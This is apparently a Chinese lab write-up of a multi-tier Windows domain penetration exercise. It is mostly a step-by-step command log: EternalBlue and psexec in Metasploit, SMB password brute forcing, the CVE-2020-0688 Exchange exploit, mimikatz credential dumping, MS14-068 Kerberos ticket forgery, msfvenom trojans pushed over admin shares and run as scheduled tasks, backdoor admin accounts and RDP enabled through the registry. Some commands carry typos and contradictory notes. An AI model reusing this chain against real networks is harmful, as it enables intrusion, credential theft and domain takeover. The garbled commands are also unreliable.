这个是第一层的第一台
ip为一个nat网卡同网段加上与第二层连接的ip
我的是192.168.75.135 +192.168.3.0/24(属于192.168.3.0/24网段的ip)
这个是第二层的(一共五台)
这个五台分为四部分虽然是四部分但是都是属于 192.168.3.0/24(网段)
账号密码都在那个虚拟机的进入界面
第一部分的 192.168.3.77+192.168.3.76
第二部分的 192.168.3.75
第三部分的 192.168.3.144
第四部分的 192.168.3.73
ip都在上面那个进入界面可以自己去按照设置
实战讲解 (接上面的文章建议一起看)
这个是第一层的补充
用那个哥斯拉连接一下http://192.168.75.135:8080/getshell/1.jsp
关防火墙netsh advfirewall set allproflies state off
在前面扫描发现是台windows然后创建木马执行,msf连接
445的永恒之蓝也可以打
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.75.135
set lport 8888
run
添加内网,查找其他主机
上传fscan64.exe /root/Desktop/fscan1/fscan-1.5.1/
实战第二层
(fscan去github上找下载对应版本的去上传内网神器)
fsacn64.exe -h 192.168.3.0/24
发现了好几台主机192.168.3.77 192.168.3.76 192.168.3.75 (发现了192.168.3.77是windows 5.1 x86 32位
192.168.3.76是windows 8.1 x64
192.168.3.75 是windows 10的
192.168.3.144是windows server2012 x64的)
针对192.168.3.77
发现了永恒之蓝漏洞用use 0 打不行因为对方是32位的use 2 (开启135,139,445)(第二部分第一层alee)
use auxiliary/admin/smb/ms17_010_command
set rhost 192.168.3.77
set command net user (尝试一下看用户)
run
set command net user zgx620 zgx@620 /add (添加用户)
run
set command net localgroup administrators zgx620 /add (添加到管理组)
run
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' (开3389端口)
rdesktop 192.168.3.76 开启远程桌面发现可以控制 (添加本地的)
添加用户就可以远程连接kali上添加网段然后再去连接
建议按照我的顺序来做比较清楚(中间两台在后面,因为没有后门,后面在第三部分192.168.75.144,192.168.3.73中优先攻击这两台)
针对192.168.3.144
(在上面的fscan扫描发现了其中的192.168.3.144好像有那个owa网站) (第二层第三部分)
dirsearch -u http://192.168.3.144 -e* (有owa网站)
nmap --script=vuln -sV 192.168.3.144
nmap -T4 -0 -sV 192.168.3.144
dirsearch -u http://192.168.3.144 -e*
第一种方法
扫描发现了永恒之蓝的漏洞用模块扫描一下发现了有ms17_010漏洞
尝试攻击
use 0
set rhosts 192.168.3.144
set lhost 192.168.75.131
set lport 5555
run (这个会蓝屏报错)
use 1(这个运行成功但是没有会话建立)
set rhosts 192.168.3.144
set lhost 192.168.75.131
set lport 5555
run
use 2
set command net user
set rhosts 192.168.3.144
run (有命令执行)可以添加一个管理员账号然后再开3389端口远程控制
set command net user (尝试一下看用户)
run
set command net user zgx620 zgx@620 /add (添加用户)
run
set command net localgroup administrators zgx620 /add (添加到管理组)
run
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' (开3389端口)
第二种(
use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt
set rhosts 192.168.3.144
set smbuser administrator
run可以 (密码是admin!@#45)
用smb凭证攻击试试
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set smbuser administrator
set smbpass admin!@#45
set rhosts 192.168.3.144 (可以得到权限)
)
第三种(exchange攻击)
exchangeg攻击(192.168.3.144/owa) diesearch扫描出来的
1.特征:开放25,587,2525 smtp服务特征
2.powershell setspn -T 0day.org -q */* 找到域在cs中测试
setspn -T 0day.org -q */*
3 用脚本 python Exchange_GetVersion_MatchVul.py 192.168.3.144 得到exchange的版本
之前的得到msf权限但是解不了密码无法直接登入
net view /domain 知道了 rootkit.org 域
net user 查看用户
net time /domain
可以用bp 爆破
格式 一般为 rootkit.org/+用户名 用户名加@rootkit.org
密码为刚刚用猕猴桃跑的那些(Admin12345 admin!@#45)
抓包 发到爆破直接爆破就可以跑了(用户名可能为那些我们net user的账号)
可以得到邮箱的账号密码
根据主页源码找exchange的版本去网上找对应漏洞(https://learn.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019#exchange-server-2019 )
找版本网站 15.0.847 -》2013版本
(exchange版本对应漏洞网站) https://www.cnblogs.com/xiaozi/p/14481595.html
CVE-2020-0688漏洞
用那个对应的那个cve-2020-0688
cd /root/Desktop/cve-2020-0688-master/
python cve-2020-0688.py -s https://(有exchange漏洞ip)/owa/ -u (使用者邮箱的名字可以任何邮箱) -p 密码 -c "cmd /c 加上命令"
python cve-2020-0688.py -s https://192.168.3.144/owa/ -u micle@rootkit.org -p Admin12345 -c "cmd /c echo 12>C:\1.txt"
python cve-2020-0688.py -s https://192.168.3.144/owa/ -u micle@rootkit.org -p Admin12345 -c "cmd /c calc.exe"
python cve-2020-0688.py -s https://192.168.3.144/owa/ -u micle@rootkit.org -p Admin12345 -c "cmd /c net localgroup administrators zgx620 /add"
python cve-2020-0688.py -s https://192.168.3.144/owa/ -u micle@rootkit.org -p Admin12345 -c "cmd /c net user zgx621 zgx@621 /add"
python cve-2020-0688.py -s https://192.168.3.144/owa/ -u micle@rootkit.org -p Admin12345 -c 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' (开3389端口)
可以写webshell进去连接,添加账号密码然后开端口连接(只能在那个exchange漏洞的本地用192.168.3.144)
用第四层渗透到我们之前没有攻击成功的另外两台
第二部分第四层(192.168.3.73)
fscan扫描发现了135,445,139,80,81,3389 但是没有永恒之蓝的漏洞还有80端口 dirsearch 扫描没有发现可以用御剑扫描后台
可以用凭证攻击进去(因为在192.168.3.144时net view发现了)
考虑一下有没有那个81,80的nginx反向代理
在81端口发现了一个网站
\\OWA2013
\\PC-JERRY-KIT
\\PC-MICLE-KIT
\\SRV-WEB-KIT
ping一下 发现了是这个192.168.3.73(尝试用那个web做那个smbuser发现了不行跟 192.168.3.75,192.168.3.76不一样尝试administrator 可以)
use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt
set rhosts 192.168.3.144
set smbuser administrator
run可以 (密码是admin!@#45)
用smb凭证攻击试试
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set smbuser administrator
set smbpass admin!@#45
set rhosts 192.168.3.73 (可以得到权限)
用kerberos凭证攻击(kerberos域渗透)(192.168.3.144,192.168.3.73都可以作为域渗透的域控制器来使用)
upload /root/Desktop/44/(上传mimikatz64位因为那个kali中的不好用)
upload /root/Desktop/MS14-068-master/ (上传那个ms14_068去生成高权限的凭证)
privilege::debug (提权)
sekurlsa::logonpasswords (抓取密码)
(MS14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码 MS14-068.exe -u douser@DEMO.COM -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123
)
MS14-068.exe -u dbadmin@ROOTKIT.ORG -s S-1-5-21-3759881954-2993291187-3577547808-1143 -d 192.168.3.144 -p admin!@#45 (用mimikatz抓到的密码跟sid 还有账号去生成凭证)
kerberos::purge (清除凭证)
kerberos::ptc "TGT_dbadmin@ROOTKIT.ORG.ccache" (注入高权限的凭证)
net use \\加上ip或者服务器名\c$
net use \\192.168.3.75\ipc$ "admin!@#45" /user:rootkit.org\administrator (进行连接的命令)
net use \\192.168.3.73\ipc$ "admin!@#45" /user:rootkit.org\administrator
net use \\192.168.3.144\ipc$ "admin!@#45" /user:rootkit.org\administrator
net use \\192.168.3.76\ipc$ "admin!@#45" /user:rootkit.org\administrator
net use \\192.168.3.73\c$ (检查连接的命令)
net use \\192.168.3.75\c$
net use \\192.168.3.144\c$
dir \\192.168.3.75\c$ (查看C盘的命令)
在域控制器中 upload /root/Desktop/66 (上传木马)
copy C:\\hh.exe \\192.168.3.75\c$(将创建的木马去复制到对应的靶机上)
dir \\192.168.3.75\c$ (在看一下)有了
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.75.131 lport=7777 -f exe -o hh1.exe(生成正向连接的木马)
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.75
set lport 7777
run (一定要正向连接,反向的没有办法连接到)(开启正向的监听)
(
copy C:\\hh.exe \\192.168.3.75\c$ #复制文件到其 C 盘
schtasks /create /s 192.168.3.75 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F
#创建 adduser 任务
对应执行文件
schtasks /run /s 192.168.3.75 /tn adduser /i #运行 adduser 任务
schtasks /delete /s 192.168.3.75 /tn adduser /f#删除 adduser 任务)
192.168.3.75 (第二层第二部分)
在fscan扫描发现了开放了 445,135,139端口(但是没有永恒之蓝,可以考虑域渗透)
通过扫描的主机名PC-JERRY-KIT (进行爆破发现了administrator和PC-JERRY-KIT都不是名字考虑一下jerry)
use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt
set rhosts 192.168.3.75
set smbuser jerry
run可以 (密码是admin)
进行攻击kerberos攻击
在192.168.3.73 192.168.3.144二选一
upload /root/Desktop/44/
upload /root/Desktop/MS14-068-master/
privilege::debug
sekurlsa::logonpasswords
MS14-068.exe -u dbadmin@ROOTKIT.ORG -s S-1-5-21-3759881954-2993291187-3577547808-1143 -d 192.168.3.144 -p admin!@#45
kerberos::purge
kerberos::ptc "TGT_dbadmin@ROOTKIT.ORG.ccache"
net use \\192.168.3.75\ipc$ "admin!@#45" /user:rootkit.org\administrator
net use \\192.168.3.75\c$
dir \\192.168.3.75\c$
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.75.131 lport=7777 -f exe -o hh1.exe
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.75
set lport 7777
run
将木马上传到域控制器中192.168.3.144 192.168.3.73
在域控制器中 upload /root/Desktop/66
copy C:\\hh.exe \\192.168.3.75\c$
dir \\192.168.3.75\c$
(在192.168.3.73跟192.168.3.144其中一台)
schtasks /create /s 192.168.3.75 /ru "SYSTEM" /tn adduser1 /sc DAILY /tr c:\hh.exe /F
schtasks /run /s 192.168.3.75 /tn adduser1 /i
192.168.3.76 (第二层第一部分第二台)
在fscan扫描发现了开放了 445,135,139端口(但是没有永恒之蓝,可以考虑域渗透)
通过扫描的主机名PC-MICLE-KIT (进行爆破发现了administrator和PC-MICLE-KIT都不是名字考虑一下micle)
use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt
set rhosts 192.168.3.75
set smbuser micle
run可以 (密码是admin)
用永恒之蓝ms17_010攻击加上
use 0
set smbuser micle
set smbpassword admin
set rhosts 192.168.3.76
run (蓝屏包戳)
进行攻击kerberos攻击
在192.168.3.73 192.168.3.144二选一
upload /root/Desktop/44/
upload /root/Desktop/MS14-068-master/
privilege::debug
sekurlsa::logonpasswords
MS14-068.exe -u dbadmin@ROOTKIT.ORG -s S-1-5-21-3759881954-2993291187-3577547808-1143 -d 192.168.3.144 -p admin!@#45
kerberos::purge
kerberos::ptc "TGT_dbadmin@ROOTKIT.ORG.ccache"
net use \\192.168.3.76\ipc$ "admin!@#45" /user:rootkit.org\administrator
net use \\192.168.3.76\c$
dir \\192.168.3.76\c$
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.75.131 lport=7777 -f exe -o hh1.exe
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.76
set lport 7777
run
将木马上传到域控制器中192.168.3.144 192.168.3.73
在域控制器中 upload /root/Desktop/66
copy C:\\hh.exe \\192.168.3.76\c$
dir \\192.168.3.76\c$ (这一台本身有很多坏的地方,容易跟主域的信任失败)
(在192.168.3.73跟192.168.3.144其中一台)
schtasks /create /s 192.168.3.76 /ru "SYSTEM" /tn adduser1 /sc DAILY /tr c:\hh.exe /F
schtasks /run /s 192.168.3.76 /tn adduser1 /i
在管理员的windowspowershell(Reset-ComputerMachinePassword -Server 192.168.3.144 -Credential rootkit\administrator) 重新信任一下
第三层跟第四层我在到时候补充一下